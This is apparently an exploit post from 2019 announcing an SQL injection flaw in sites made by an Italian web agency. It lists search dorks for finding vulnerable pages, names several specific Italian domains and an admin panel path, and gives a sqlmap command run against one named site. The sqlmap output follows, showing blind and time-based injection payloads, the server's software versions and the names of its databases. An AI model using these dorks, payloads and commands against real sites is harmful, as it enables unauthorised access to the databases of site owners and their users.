# Exploit Title:alfacommunication.it SQL Injection vulnerability # Date:29/11/2019 # Dork: inurl:detail.php?id= site:.it inurl:5ad.php?id= site:.it inurl:single-news.php?id= site:.it inurl:caseinterno.php?id= site.it # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:54.76.134.14 .php?id= (There are 55 domains hosted on this server.) # Demo ediliziafiorentina.it/detail.php?id=19 old.faraone.it/5ad.php?id=319 intesagdi.it/0a-newsdetail.php?id=405 # Admin control panel path site.it/cms/ # Poc: sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://old.faraone.it/5ad.php?id=319' --no-cast --batch --dbs --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=319 AND 7712=7712 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=319 AND (SELECT 9560 FROM (SELECT(SLEEP(5)))ORoc) --- web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal) web application technology: Apache 2.2.22, PHP back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] `cms-faraone` [*] information_schema ------------------------ video:https://www.youtube.com/watch?v=EEvMO-jyDPE Greets:To All My Friends